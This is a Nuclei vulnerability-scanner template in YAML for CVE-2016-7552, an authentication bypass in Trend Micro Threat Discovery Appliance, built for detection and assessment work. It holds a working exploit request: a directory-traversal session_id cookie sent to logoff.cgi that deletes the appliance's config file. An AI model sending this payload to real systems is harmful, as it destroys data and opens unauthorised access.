46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2016-7552
|
|
|
|
info:
|
|
name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
|
|
remediation: |
|
|
Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability.
|
|
reference:
|
|
- https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-7552
|
|
- https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-7552
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97004
|
|
epss-percentile: 0.99681
|
|
cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: trendmicro
|
|
product: threat_discovery_appliance
|
|
tags: msf,cve,cve2016,lfi,auth,bypass
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/logoff.cgi"
|
|
|
|
headers:
|
|
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Memory map"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100f94ac860dc3e8f0596d0f1ff2cc0216572e607fc9a80a6cc71a4b5e7a8ab770d022025453afcb701644d58bd8b104aca7eb245a0863fe1169f541c66983e4b774b7f:922c64590222798bb761d5b6d8e72950 |